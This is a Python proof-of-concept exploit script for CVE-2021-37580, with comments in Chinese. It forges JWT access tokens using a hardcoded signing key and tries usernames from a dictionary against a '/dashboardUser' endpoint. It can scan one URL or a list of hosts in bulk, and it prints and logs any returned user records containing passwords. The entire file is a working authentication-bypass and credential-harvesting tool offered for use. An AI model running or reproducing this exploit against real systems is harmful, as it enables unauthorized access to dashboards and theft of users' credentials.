cve-2021-37580-poc.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Date    : 2021-11-17 20:40:04
# @Author  : 江南小虫虫 (fwh13612265462@gmail.com)
# @Link    : https://fengwenhua.top
import jwt
import time
import requests
import json
import sys
import argparse
requests.packages.urllib3.disable_warnings()


def generateToken(username):
    headers = {
        "alg": "HS256",
        "typ": "JWT"
    }
    # 设置headers，即加密算法的配置
    salt = "2095132720951327"
    # 随机的salt密钥，只有token生成者（同时也是校验者）自己能有，用于校验生成的token是否合法
    exp = int(time.time())
    # 设置超时时间：当前时间的100s以后超时
    payload = {
        "userName": username,
        "exp": exp
    }
    # 配置主体信息，一般是登录成功的用户之类的，因为jwt的主体信息很容易被解码，所以不要放敏感信息
    # 当然也可以将敏感信息加密后再放进payload

    token = jwt.encode(payload=payload, key=salt,
                       algorithm='HS256', headers=headers).decode('utf-8')
    # 生成token
    # print(token)
    return token


def load_file(file_path):
    try:
        with open(file_path, 'r') as f:
            content = f.read().splitlines()
            return content
    except Exception as e:
        if 'username.txt' in str(e):
            print(
                '找不到用户名字典文件！！！请用参数-n 指定一个用户名字典.txt，或者新建一个 username.txt，放在脚本的同目录下，文件的内容是，一行一个用户名')
        else:
            print(e)
        sys.exit(-1)


def write_file(data_list):
    with open('CVE-2021-37580-vul-list-{}.txt'.format(log_time), 'w') as f:
        f.write('\n'.join(data_list))


def poc(host, username):
    url = host + '/dashboardUser'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0',
        'X-Access-Token': generateToken(username)
    }
    r = requests.get(url, headers=headers, verify=False)
    result = r.text
    # print(result)
    if r.status_code == 200 and 'password' in result:
        dataList = json.loads(result)['data']['dataList']
        #print('{} is VUL!! '.format(host))
        # print(dataList)
        return dataList
    else:
        # {"code":600,"message":"token is error"}
        # print('{} is NO VUL'.format(host))
        return False


if __name__ == '__main__':
    if len(sys.argv) == 1:
        print("Usage: python3 CVE-2021-37580.py -u url -n username.txt")
        sys.exit()
    parser = argparse.ArgumentParser(
        description='CVE-2021-37580 poc工具')
    parser.add_argument('-u', '--url', help='指定单个url')
    parser.add_argument('-f', '--file', help='指定url.txt')
    parser.add_argument(
        '-n', '--name', default='username.txt', help='指定用户名文件字典.txt')
    args = parser.parse_args()

    target = args.url
    name_file = args.name
    log_time = int(time.time())
    logs_file = open('CVE-2021-37580-log-{}.txt'.format(log_time), 'w')
    vul = False
    if target:
        if not 'http' in target:
            target = 'http://' + target
        print('[*] checking {}'.format(target))
        print('[*] checking {}'.format(target), file=logs_file)
        try:
            for name in load_file(name_file):
                print('[*] using name: {}'.format(name))
                print('[*] using name: {}'.format(name), file=logs_file)
                res = poc(target, name)
                if res:
                    print('[+] {} is VUL!! '.format(target))
                    print('[+] {} is VUL!! '.format(target), file=logs_file)
                    print(res)
                    vul = True
                    break
            if not vul:
                print('[-] {} is NO VUL!! '.format(target))
                print('[-] {} is NO VUL!! '.format(target), file=logs_file)
        except Exception as e:
            print(e)
    if args.file:
        vul_url_list = []
        try:
            for url in load_file(args.file):
                if not 'http' in url:
                    url = 'http://' + url
                print('[*] checking {}'.format(url))
                print('[*] checking {}'.format(url), file=logs_file)
                try:
                    for name in load_file(name_file):
                        print('[*] using name: {}'.format(name))
                        print('[*] using name: {}'.format(name), file=logs_file)
                        res = poc(url, name)
                        if res:
                            print('[+] {} is VUL!! '.format(url))
                            print('[+] {} is VUL!! '.format(url),
                                  file=logs_file)
                            print(res)
                            print(res, file=logs_file)
                            vul = True
                            vul_url_list.append(url)
                            break
                    if not vul:
                        print('[-] {} is NO VUL!! '.format(url))
                        print('[-] {} is NO VUL!! '.format(url), file=logs_file)
                except Exception as e:
                    print(e)
                    print(e, file=logs_file)
                print('\r\n')
                print('\r\n', file=logs_file)
        except Exception as e:
            print(e)
            print(e, file=logs_file)
        if len(vul_url_list) > 0:
            write_file(vul_url_list)
            print("有漏洞的url列表已经写入文件当前目录下的 CVE-2021-37580-vul-list.txt 了")
    logs_file.close()